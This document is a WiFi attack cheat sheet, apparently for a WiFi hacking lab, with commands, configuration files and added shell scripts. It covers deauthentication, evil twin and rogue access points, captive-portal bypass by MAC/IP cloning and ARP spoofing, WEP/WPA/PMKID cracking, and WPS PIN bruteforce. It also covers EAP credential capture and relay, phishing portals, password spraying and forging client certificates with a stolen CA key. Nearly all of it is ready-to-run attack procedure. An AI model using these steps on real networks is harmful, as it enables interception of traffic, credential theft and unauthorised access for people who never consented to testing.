Managing interfaces
Interface status
iw dev
iw wlan0 link
Up/Down interfaces
ip link set dev wlan0 up
ip link set dev wlan0 down
Configure interface on a specific channel
iwconfig wlan0mon channel 1
Scan wifi networks
iw dev wlan0 scan
iw wlan0 scan
Connect to a wifi network
wpa_supplicant
# wpa_supplicant.conf for an open (OPN) network: key_mgmt=NONE means no WPA key management; scan_ssid=1 sends directed probe requests so hidden SSIDs are found too
network={
ssid="SSID_NAME"
key_mgmt=NONE
scan_ssid=1
}
wpa_supplicant -i wlan1 -c wpa_supplicant.conf
nmcli
nmcli dev wifi connect SSID_NAME password PASSWORD
Obtain IP
dhclient wlan0 -v
Monitor mode
sudo airmon-ng check kill # kill processes (NetworkManager, wpa_supplicant) that may interfere with airmon-ng
sudo airmon-ng start wlan0 # creates the monitor interface wlan0mon
sudo airmon-ng stop wlan0mon
Change MAC
sudo macchanger -r wlan0 # change the MAC to a random one (bring the interface down first)
sudo macchanger -m 00:11:22:33:44:55 wlan0
Offensive WiFi Recon
Wifi Packet Dump
sudo airodump-ng --band abg -w [outputfile] --gpsd wlan0mon
# --band abg ==> list all networks operating in 2.4 GHz (b/g) and 5 GHz (a)
# --gpsd ==> record GPS coordinates (needs a running gpsd)
# -c ==> channel
# --bssid ==> only capture the given AP
# -w ==> output file prefix (airodump-ng appends -01.cap, -01.csv, ...)
# airodump-ng hot keys
=====================
s ==> sort; press multiple times to sort on different columns
TAB ==> enter selection mode
m ==> mark the selected AP with a colour
Space ==> pause screen output
Wifi Packet Analysis
python3 wifi_db.py -d database.db /airodump_output_dir/
# -d ==> sqlite file the analysed captures are imported into
sqlitebrowser database.db # view the generated db
Hidden Networks
Listing hidden networks
sudo iwlist wlan0 scan
sudo airodump-ng wlan0mon
# airodump-ng shows a hidden ESSID as <length: N>; knowing the length shrinks the bruteforce space, so we can abuse it to bruteforce the name
Obtaining hidden ESSID
- Bruteforce ESSID
mdk4 wlan0mon p -t [BSSID] -f [ESSID-DIC]
# p ==> probing/auditing mode for hidden networks
# -t ==> MAC of the target AP
# -f ==> wordlist of candidate ESSIDs
- Client reconnect
An AP reveals its ESSID in the probe response / association exchange when a client (re)connects, so we can either wait for a client to reconnect to the hidden network, or force it with a deauth attack and capture the reconnection.
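One detail worth automating, as an added example that is not part of the original page: airodump-ng reports a hidden network as `<length: N>`, and N counts ESSID bytes, not characters, so the wordlist filter below runs awk in the C locale to compare byte lengths (an accented ESSID such as "café" is 5 bytes). The wordlist contents and the length are constructed for the demonstration.

```sh
# Keep only the wordlist entries whose byte length matches the "<length: N>"
# that airodump-ng showed for the hidden ESSID, before feeding them to
# mdk4 wlan0mon p -t <BSSID> -f <filtered list>.
essid_candidates() {
  wordlist=$1   # one candidate ESSID per line
  length=$2     # N from airodump-ng's <length: N>
  # LC_ALL=C makes awk's length() count bytes, matching the 802.11 SSID
  # element length; in a UTF-8 locale it would count characters instead.
  LC_ALL=C awk -v n="$length" 'length($0) == n' "$wordlist"
}

# Constructed demo wordlist (hypothetical contents, written to a temp file)
demo_wordlist() {
  f=$(mktemp)
  printf 'corp\nguest\nwifi-corp\ncaf\303\251\n' > "$f"   # last entry is "café"
  printf '%s' "$f"
}

# usage: essid_candidates "$(demo_wordlist)" 5   -> guest and café
```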
Wifi Attacks
General
Packet Capture
sudo airodump-ng --band abg -w [outputfile] --gpsd wlan0mon
sudo airodump-ng -c [channel] -w [outputfile] wlan0mon # focus on a specific channel
Packet Injection
- Test if the device supports packet injection
sudo aireplay-ng --test wlan0mon
- ARP injection attack
sudo aireplay-ng -3 -b [target_BSSID] -h [your_MAC] wlan0mon # -3 ==> aireplay-ng attack mode 3 (ARP request replay)
OPN Networks
Bypassing captive portals
MAC spoofing
Captive portals usually authorise a client by its MAC (and IP) address once it has logged in, so cloning the address of an already-authorised client gets us through. Use one of the following methods
sudo ip link set dev <INTERFACE> down
sudo ip link set dev <INTERFACE> address <AUTHORIZED_CLIENT_MAC>
sudo ip link set dev <INTERFACE> up
Or
ip link set <INTERFACE> down
macchanger -m <AUTHORIZED_CLIENT_MAC> <INTERFACE>
ip link set <INTERFACE> up
Now, connect with wpa_supplicant
IP spoofing
- Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
- MITM attack by ARP spoofing between the authorised client and the gateway
ettercap -T -q -i wlan0 -w dump -M ARP /<AUTHORIZED_CLIENT_IP>/ /<GATEWAY_IP>/
- Spoof the authenticated IP on our own traffic leaving the LAN (iptables expects the ! before -d)
iptables -t nat -A OUTPUT ! -d <LAN> -j SNAT --to <AUTHORIZED_CLIENT_IP>
- Increase TTL by 1 to avoid detection: packets we forward lose one hop on our box, so add it back to keep the TTL the portal expects from the real client
iptables -t mangle -A FORWARD -d <AUTHORIZED_CLIENT_IP> -j TTL --ttl-inc 1
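The MAC and IP cloning steps above as one script, added here as an example that is not from the original page. Interface, MAC, IP and LAN range are hypothetical arguments; with DRY_RUN=1 the commands are printed instead of executed, so the input validation and the rule set can be checked without root or a wireless card.

```sh
#!/bin/sh
# Clone an authorised captive-portal client: take its MAC, then SNAT our own
# outbound traffic to its IP and compensate the TTL of forwarded packets.
# DRY_RUN=1 prints the commands instead of running them.

run() {
  if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

valid_mac() {
  # six colon-separated hex octets, e.g. 00:11:22:33:44:55
  printf '%s' "$1" | grep -Eqi '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

valid_ipv4() {
  printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

clone_client() {
  iface=$1 mac=$2 ip=$3 lan=$4   # lan is a CIDR such as 10.0.0.0/24 (hypothetical)
  valid_mac "$mac" || { echo "invalid MAC: $mac" >&2; return 1; }
  valid_ipv4 "$ip" || { echo "invalid IP: $ip" >&2; return 1; }
  # 1. MAC clone: the address can only be changed while the link is down
  run ip link set dev "$iface" down
  run ip link set dev "$iface" address "$mac"
  run ip link set dev "$iface" up
  # 2. IP clone: forward for the real client (ARP-spoofed with ettercap
  #    separately) and source-NAT our own traffic that leaves the LAN
  run sysctl -w net.ipv4.ip_forward=1
  run iptables -t nat -A OUTPUT ! -d "$lan" -j SNAT --to-source "$ip"
  # 3. Forwarded packets lose one TTL hop on our box; add it back so the
  #    portal/gateway keeps seeing the TTL the real client produces
  run iptables -t mangle -A FORWARD -d "$ip" -j TTL --ttl-inc 1
}

# usage: DRY_RUN=1 clone_client wlan0 00:11:22:33:44:55 10.0.0.42 10.0.0.0/24
```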
Credentials Theft
If the captive portal doesn't use TLS, we can view the credentials in clear text by sniffing the traffic
- Sniff traffic
sudo airodump-ng <INTERFACE_MON> -w ~/wifi/scan --manufacturer --wps -c <CHANNEL>
- Filter the HTTP traffic in Wireshark (the login form is a POST carrying the credentials in its body)
DNS Tunnel bypass
Since DNS requests are generally allowed even on networks with captive portals, this protocol can be used to create a communication channel (a DNS tunnel such as iodine) that bypasses the portal restrictions.
Captive portal webtest
The captive portal is a web application: try to find a vulnerability in it (auth bypass, injection, exposed admin endpoints) to bypass the login
Evil Twin
- Create a hostapd config file (open AP on channel 6; assign 192.168.1.1/24 to wlan0 before starting)
interface=wlan0
driver=nl80211
ssid=FakeOpenNetwork
hw_mode=g
channel=6
- Configure a DHCP server with dnsmasq by editing /etc/dnsmasq.conf
interface=wlan0
dhcp-range=192.168.1.50,192.168.1.150,12h
- dnsmasq can also answer the victims' DNS queries with attacker-controlled addresses, redirecting them to fake websites we host
address=/example.com/192.168.1.100
View unencrypted traffic
- Using tcpdump and wireshark, or with airodump-ng
tcpdump -i wlan0 -w capture.pcap
wireshark capture.pcap
OWE
Opportunistic Wireless Encryption (Wi-Fi Enhanced Open), introduced alongside WPA3, protects open networks by encrypting the traffic with a per-client Diffie-Hellman derived key, without any shared password. The client still has no way to authenticate the AP, so it can be attacked by:
- Evil Twin attacks
- Social Engineering: fake login pages built with SET (Social Engineering Toolkit)
WEP
Wired Equivalent Privacy, the first attempt (1999) to encrypt wifi communications. Its RC4 key stream is derived from the key and a 24-bit IV, so IVs repeat and the key can be recovered statistically once enough IVs are captured.
- Capturing and cracking WEP traffic
Accelerating IV capturing
- Fake Authentication
Associate with the AP as a fake client so that it accepts the frames we inject
aireplay-ng -1 0 -a <AP MAC> -h <Client MAC> wlan0mon
- ARP Request Replay Attack (arpreplay)
Capture valid ARP packets, then repeatedly re-inject them into the network; every reply the AP sends carries a new IV
aireplay-ng --arpreplay -b <AP MAC> -h <Fake Client MAC> wlan0mon
- Deauthentication attacks (force clients to reconnect and generate ARP traffic)
mdk4 wlan0mon d -B [BSSID]
Dumping traffic
airodump-ng -c channel_num --bssid BSSID -w output-file wlan0mon
Cracking the key through the IVs
aircrack-ng capture.cap -b <AP-MAC>
Automatic attack
besside-ng -c 3 -b <AP-MAC> wlan0mon -v
PSK
- Deauth attack to force clients to perform the 4-way handshake again
- Capture handshakes
sudo airodump-ng wlan0mon -c <channel> -w ~/wifi/capture
- Cracking against a dictionary
# Cracking with aircrack-ng
sudo aircrack-ng -w /path/to/dictionary.txt capture-01.cap
# Cracking with hashcat
hcxpcapngtool -o hash.22000 capture-01.cap # convert the capture to hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL)
sudo hashcat -a 0 -m 22000 hash.22000 ~/rockyou.txt --force
PMKID vulnerability
The clientless attack. Some APs put the PMKID (HMAC-SHA1-128 keyed with the PMK over "PMK Name" | AP MAC | client MAC) in the first EAPOL message, so a single association attempt by the attacker yields crackable material, no connected client or deauth needed.
sudo hcxdumptool -i wlan0mon -o capture.pcapng # capture the PMKID (hcxdumptool 6.3+ uses -w instead of -o for the output file)
sudo hcxpcapngtool -o capture.22000 capture.pcapng # convert to hashcat format; its summary reports how many PMKIDs and EAPOL handshakes the capture holds
sudo hashcat -m 22000 -a 0 capture.22000 /path/to/dictionary.txt # crack
NoAP
Also known as the half-handshake attack. Cracking a PSK only needs the first two messages of the 4-way handshake: the AP's ANonce (message 1) and the client's SNonce together with the MIC that the client computes with the PTK derived from the PSK (message 2). The MIC is what the cracker verifies, and it is produced by the client, so the real AP is not needed at all: start our own AP with the ESSID the client probes for and let the client send message 2 to us.
- Prepare hostapd.conf (mana_wpaout is a hostapd-mana option that writes the captured half-handshakes directly in hashcat hccapx format)
interface=$INTERFACE
driver=nl80211
hw_mode=g
channel=1
ssid=$ESSID
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
- Start the fake AP
hostapd hostapd.conf
- Dump and crack
Don't forget to also run airodump-ng on the BSSID of our fake AP, so the half-handshake is captured in a .cap as well
WPS PIN
sudo wash -i wlan0mon # list APs with WPS enabled and whether WPS is locked
sudo airodump-ng wlan0mon --wps # also shows the WPS state per network
sudo reaver -i wlan0mon -b <BSSID> -vv # bruteforce the 8-digit PIN (validated in two halves, at most 10^4 + 10^3 attempts) and recover the PSK
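Why the PIN space is only 11,000 and not 10^8, as an added example that is not from the original page: the last PIN digit is a checksum of the first seven, and the registrar acknowledges the first half (4 digits) and the second half (3 digits plus checksum) separately. The functions below implement the WPS checksum and a PIN validity check; the PINs used are constructed test values.

```sh
# WPS PIN arithmetic. Odd positions (1st, 3rd, 5th, 7th) weigh 3, even
# positions weigh 1; the checksum digit makes the weighted sum a multiple of 10.
wps_checksum() {
  # $1 = first seven PIN digits; prints the checksum (8th) digit
  digits=$1 acc=0 i=0
  while [ "$i" -lt 7 ]; do
    d=$(printf '%s' "$digits" | cut -c"$((i + 1))")
    if [ $((i % 2)) -eq 0 ]; then acc=$((acc + 3 * d)); else acc=$((acc + d)); fi
    i=$((i + 1))
  done
  echo $(( (10 - acc % 10) % 10 ))
}

wps_pin_valid() {
  # $1 = full 8-digit PIN; succeeds if its checksum digit is consistent.
  # Only 10^7 of the 10^8 PINs pass, and because the registrar leaks the
  # result per half, reaver needs at most 10^4 + 10^3 = 11,000 tries.
  pin=$1
  printf '%s' "$pin" | grep -Eq '^[0-9]{8}$' || return 1
  [ "$(printf '%s' "$pin" | cut -c8)" = "$(wps_checksum "$(printf '%s' "$pin" | cut -c1-7)")" ]
}

# usage: wps_pin_valid 12345670 && echo "checksum ok"
```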
KRACK attack
Key Reinstallation Attack. To be added.
FRAGAttack
Fragmentation and Aggregation attacks. To be added.
Evil Twin Attack
- Configure hostapd for the fake AP (wpa=3 accepts both WPA and WPA2 clients)
interface=$INTERFACE
driver=nl80211
ssid=$SSID
hw_mode=g
channel=$CHANNEL
auth_algs=1
wpa=3
wpa_passphrase=$WPA_PASSPHRASE
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
- dnsmasq for the DHCP and DNS servers (option 3 is the default gateway, option 6 the DNS server, both pointing at our interface; 8.8.8.8 is the upstream resolver)
interface=$INTERFACE
dhcp-range=192.168.2.2,192.168.2.100,12h
dhcp-option=3,192.168.2.1
dhcp-option=6,192.168.2.1
server=8.8.8.8
log-queries
log-dhcp
- Start dnsmasq
sudo dnsmasq -C dnsmasq.conf
- Route the victims' traffic to the internet using iptables (eth0 is the uplink; $INTERFACE must hold 192.168.2.1/24)
sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
sudo iptables --append FORWARD --in-interface $INTERFACE -j ACCEPT
- Enable packet forwarding on linux
sudo sysctl -w net.ipv4.ip_forward=1
- MITM attack (sniff the traffic passing through us)
sudo ettercap -T -q -i $INTERFACE
- Start hostapd
sudo hostapd hostapd.conf
This fake access point can also be configured as OPN with a captive portal that asks users for the PSK to log in, using airgeddon.
Traffic Decryption
airdecap-ng -e $ESSID -p $PASSWORD ~/wifi/scanc6-01.cap # decrypts a WPA capture that contains the handshake; writes scanc6-01-dec.cap
Custom Dictionaries
mp64 'password?d?d' > variations.txt # maskprocessor from hashcat-utils; masks: ?u uppercase, ?l lowercase, ?d digits, ?s special characters
crunch min_length max_length -t password@@@@ > crunch_variations.txt # patterns: @ lowercase letters, , uppercase letters, % numbers, ^ special characters; min/max length must equal the pattern length
john --wordlist=base_words.txt --rules --stdout > wordlist_variations.txt
cewl -d 2 -m 5 -w docswords.txt <URL> # scrape words of at least 5 characters, 2 links deep, from the target's website
SAE
(Simultaneous Authentication of Equals, the WPA3-Personal handshake: the password never goes on the air and the exchange is designed to resist offline dictionary attacks)
WPA2 Downgrade Attack
- Only works when the AP runs in WPA2/WPA3 transition mode and the client accepts WPA2. Make sure that client and AP are not using MFP (Management Frame Protection); if they are, deauth attacks won't be possible (check with wifi_db or wireshark: the RSN capabilities field shows whether MFP is capable/required)
- Perform a deauthentication attack
- Perform a NoAP attack announcing WPA2 only, so the client sends a WPA2 half-handshake that can be cracked offline
Online Bruteforce
With no offline attack available, the remaining option is to try passwords against the AP one at a time (the AP may throttle us with anti-clogging tokens)
./wacker.py --wordlist $DICCIONARIO --ssid $ESSID --bssid $BSSID --interface $INTERFACE --freq $FRECUENCIA_CANAL
# --freq is the channel's centre frequency in MHz; look it up on Wikipedia or with iwlist (channel 11 is 2462 MHz)
sudo iwlist wlan0 frequency | grep 'Channel 11 :'
./wacker.py --wordlist $DICCIONARIO --ssid $ESSID --bssid $BSSID --interface $INTERFACE --freq 2462
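A channel-to-frequency helper for wacker's --freq, added here as an example that is not part of the original page. It encodes the 2.4 GHz and 5 GHz channel plans (channel 14 and the 6 GHz band, whose channel numbers overlap the 2.4 GHz ones, are handled as noted in the comments); the channels passed in the usage line are constructed values.

```sh
# Convert an 802.11 channel number to the centre frequency in MHz.
# 2.4 GHz: channels 1-13 are 2407 + 5*ch, channel 14 (Japan, 802.11b) is 2484.
# 5 GHz:   channels 36-177 are 5000 + 5*ch.
# 6 GHz channels reuse the numbers 1-233 (5950 + 5*ch), so they cannot be told
# apart from 2.4 GHz by number alone and are deliberately not guessed here.
chan2freq() {
  ch=$1
  printf '%s' "$ch" | grep -Eq '^[0-9]+$' || return 1
  if [ "$ch" -ge 1 ] && [ "$ch" -le 13 ]; then
    echo $((2407 + 5 * ch))
  elif [ "$ch" -eq 14 ]; then
    echo 2484
  elif [ "$ch" -ge 36 ] && [ "$ch" -le 177 ]; then
    echo $((5000 + 5 * ch))
  else
    echo "unsupported channel: $ch" >&2
    return 1
  fi
}

# usage: ./wacker.py --wordlist "$DICCIONARIO" --ssid "$ESSID" --bssid "$BSSID" \
#          --interface "$INTERFACE" --freq "$(chan2freq 11)"   # 2462
```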
Evil Twin Attacks
Evil Twin with OPN Attacks
MGMT
Recon
Identity Recon
- If anonymous outer identities are not used, the EAP Identity Response is sent in clear before the TLS tunnel is established, so we can collect identities (usernames) using
airodump-ng wlan0mon -c 11 -w /mgmt/scan --wps
- Then analyse the output using
- wireshark
wireshark filter
eap # shows the EAP Identity Response messages
- tshark
tshark -r /mgmt/scan-01.cap -Y '(eap && wlan.ra == XX:XX:XX:XX:XX:XX) && (eap.identity)' -T fields -e eap.identity
- wifi_db
python3 wifi_db.py -d wifidata.SQLITE /home/user/wifi/ # generate the sqlite db from the capture files
sqlitebrowser wifidata.SQLITE # view it
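Turning the collected identities into a username list for the bruteforce and password-spray steps later on this page, as an added example that is not part of the original page. The identity values are constructed to look like tshark's `-T fields -e eap.identity` output; real captures also contain outer identities such as anonymous@realm, which are placeholders sent before the TLS tunnel and carry no username, so they are dropped.

```sh
# stdin: one eap.identity value per line (as printed by tshark)
# stdout: unique bare usernames, ready for air-hammer's -u list
eap_usernames() {
  grep -v '^[[:space:]]*$' \
  | grep -viE '^anonymous' \
  | sed -e 's/^.*\\//' -e 's/@.*$//' \
  | sort -u
}
# Lines starting with "anonymous" are PEAP/TTLS outer identities; DOMAIN\user
# and user@realm are reduced to user; duplicates from repeated EAP rounds go.

# Constructed sample of what
#   tshark -r scan-01.cap -Y 'eap.identity' -T fields -e eap.identity
# prints (hypothetical values):
sample_identities() {
  printf 'CORP\\alice\nbob@corp.local\nanonymous@corp.local\nalice@corp.local\n\nCORP\\carol\n'
}

# usage: sample_identities | eap_usernames > usernames.list   # alice bob carol
```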
Certificate Analysis
We can extract the server certificate used for the EAP TLS tunnel from the pcap file (it reveals the CA, the server name and whether an internal or self-signed CA is used, which tells us what our rogue certificate must imitate) using
- pcapFilter
pcapFilter.sh -f /mgmt/scan-02.cap -C
- wireshark
wireshark filter
(wlan.sa == XX:XX:XX:XX:XX:XX) && (tls.handshake.certificate)
- tshark
tshark -r /home/user/wifi/scan-02.cap -Y "wlan.bssid == XX:XX:XX:XX:XX:XX && ssl.handshake.type == 11" -V # handshake type 11 is the Certificate message
EAP Authentication Analysis
Check which EAP authentication methods the target network supports
EAP_buster.sh ssid 'DOMAIN\User' wlan1
Attacks
Rogue AP
- Two conditions
  - the client authenticates with username:password (PEAP-MSCHAPv2, EAP-TTLS, EAP-GTC), not with a client certificate (EAP-TLS)
  - the client doesn't validate the server certificate against a trusted CA, so it accepts ours
- Generate a fake certificate
python3 ./eaphammer --cert-wizard
- Start the rogue AP on the same channel as the target and wait for clients to connect (we can force them with a deauth attack)
- If the client uses MSCHAPv2
  - Start eaphammer and collect the clients' hashed challenge/response pairs
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid $ESSID --creds
  - Crack the challenge responses (NetNTLMv1/MSCHAPv2 format, hashcat mode 5500; save the hash line eaphammer prints to <HASHFILE>)
hashcat -a 0 -m 5500 <HASHFILE> ~/rockyou.txt --force
- If the client uses GTC
Same as with MSCHAPv2, but we can tell eaphammer to negotiate the weakest EAP method first; if the client accepts GTC, it sends the password in clear text inside the tunnel and no cracking is needed
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate weakest
We can also use airgeddon or perform the entire attack manually using hostapd
Relay Attack
- Connect to the real AP and relay the challenge/response exchange. We use wpa_sycophant to forward the EAP authentication from our fake AP to the real one; its config file makes sure it connects to the real AP and not to our own rogue AP
wpa_sycophant.conf
network={
## ssid is the name of the network you want to relay to; you can relay user credentials to other networks too
ssid="$ESSID"
scan_ssid=1
key_mgmt=WPA-EAP
## Do not modify: these are filled in with the relayed client's values
identity=""
anonymous_identity=""
password=""
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
## if auth fails, use: phase1="peapver=1"
phase2="auth=MSCHAPV2"
## Don't connect back to ourselves, so add the rogue BSSID here
bssid_blacklist=$BSSID_AP
}
Run it
wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan3
- Bring up the fake AP
berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log wlan1 lo $ESSID
If a client connects but its credentials aren't forwarded to the real AP, replace phase1 in the wpa_sycophant configuration with phase1="peapver=1", as some APs require PEAP version 1.
Bruteforce
air-hammer.py -i wlan3 -e $ESSID -p $DICCIONARIO -u username.list
Authentication servers usually forward the attempts to AD, so many failures against one user may lock the account out; prefer spraying one password across many users.
Password Spray
./air-hammer.py -i wlan4 -e wifi-corp -P 12345678 -u usernames.list
Rogue AP (captive portal)
- Create the HTML captive portal within
./core/wskeyloggerd/templates/user_defined/login/body.html
- Start the rogue AP
sudo killall dnsmasq
./eaphammer --essid WiFi-Restaurant --interface wlan4 --captive-portal
A rogue AP with a captive portal can also be built with airgeddon or wifiphisher, which imitates the Windows wifi connection window
wifiphisher -aI wlan0 -p wifi_connect --handshake-capture handshake.pcap
Abusing stolen CA
Create AP
- Import the stolen CA certificate and server key into eaphammer
python3 ./eaphammer --cert-wizard import --server-cert /path/to/server.crt --ca-cert /path/to/ca.crt --private-key /path/to/server.key --private-key-passwd whatever
- Spawn the fake AP with the stolen CA certificate; clients that do validate the server certificate against that CA now trust us too
python3 ./eaphammer -i wlan4 --auth wpa-eap --essid wifi-corp
- Perform a deauth attack against the clients
Create client Cert
With the CA key we can also sign our own client certificate and authenticate to an EAP-TLS network as the identity we put in it.
- Generate client.key
openssl genrsa -out client.key 2048
- Prepare the config files
client.conf
[ req ]
default_bits = 2048
distinguished_name = req_DN
string_mask = nombstr
[ req_DN ]
countryName = "1. Country Name (2 letter code)"
countryName_default = ES
countryName_min = 2
countryName_max = 2
stateOrProvinceName = "2. State or Province Name (full name)"
stateOrProvinceName_default = Madrid
localityName = "3. Locality Name (eg, city)"
localityName_default = Madrid
0.organizationName = "4. Organization Name (eg, company)"
0.organizationName_default = WiFiChallenge Lab
organizationalUnitName = "5. Organizational Unit Name (eg, section)"
#organizationalUnitName_default =
commonName = "6. Common Name (eg, CA name)"
commonName_max = 64
commonName_default = WiFiChallenge Lab CA
emailAddress = "7. Email Address (eg, name@FQDN)"
emailAddress_max = 40
emailAddress_default = client@WiFiChallengeLab.com
client.ext
extensions = x509v3
[ x509v3 ]
nsCertType = client,email,objsign
keyUsage = digitalSignature,nonRepudiation,keyEncipherment,dataEncipherment
- Generate the CSR
openssl req -config client.conf -new -key client.key -out client.csr
- Sign it with the stolen CA (use -CAcreateserial instead of -CAserial ca.serial if no serial file exists yet)
openssl x509 -days 730 -extfile client.ext -CA ca.crt -CAkey ca.key -CAserial ca.serial -in client.csr -req -out client.crt
cat client.crt client.key > client.pem.crt
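The same procedure end to end and non-interactively, as an added example that is not from the original page. The CA created by make_ca is a throwaway stand-in for the stolen one so the script runs offline; with a real ca.crt/ca.key, skip make_ca and point make_client_cert at the directory holding them. The subject values and the identity are hypothetical, and the final openssl verify performs the check a RADIUS server does on the chain.

```sh
#!/bin/sh
# Mint an EAP-TLS client certificate with a CA whose key we hold.
set -e

make_ca() {
  # Throwaway CA standing in for the stolen one (hypothetical subject)
  dir=$1
  openssl req -x509 -batch -newkey rsa:2048 -nodes -days 365 \
    -subj "/C=ES/O=WiFiChallenge Lab/CN=WiFiChallenge Lab CA" \
    -keyout "$dir/ca.key" -out "$dir/ca.crt" 2>/dev/null
}

make_client_cert() {
  # $1 = dir containing ca.crt and ca.key; $2 = identity to put in the CN
  dir=$1 cn=$2
  # Client-auth extensions (same as client.ext above, plus the EKU many
  # RADIUS servers require on client certificates)
  cat > "$dir/client.ext" <<'EOF'
extensions = x509v3
[ x509v3 ]
nsCertType = client,email,objsign
keyUsage = digitalSignature,nonRepudiation,keyEncipherment,dataEncipherment
extendedKeyUsage = clientAuth
EOF
  openssl genrsa -out "$dir/client.key" 2048 2>/dev/null
  # -subj replaces the interactive DN prompts of client.conf
  openssl req -new -batch -key "$dir/client.key" \
    -subj "/C=ES/O=WiFiChallenge Lab/CN=$cn" -out "$dir/client.csr" 2>/dev/null
  # -CAcreateserial avoids needing a pre-existing ca.serial
  openssl x509 -req -days 730 -in "$dir/client.csr" \
    -CA "$dir/ca.crt" -CAkey "$dir/ca.key" -CAcreateserial \
    -extfile "$dir/client.ext" -out "$dir/client.crt" 2>/dev/null
  # wpa_supplicant/eaphammer take cert and key in one PEM file
  cat "$dir/client.crt" "$dir/client.key" > "$dir/client.pem.crt"
  # The server-side check: does the chain end at the CA the server trusts?
  openssl verify -CAfile "$dir/ca.crt" "$dir/client.crt" >/dev/null
}

# usage: d=$(mktemp -d); make_ca "$d"; make_client_cert "$d" 'alice@WiFiChallengeLab.com'
```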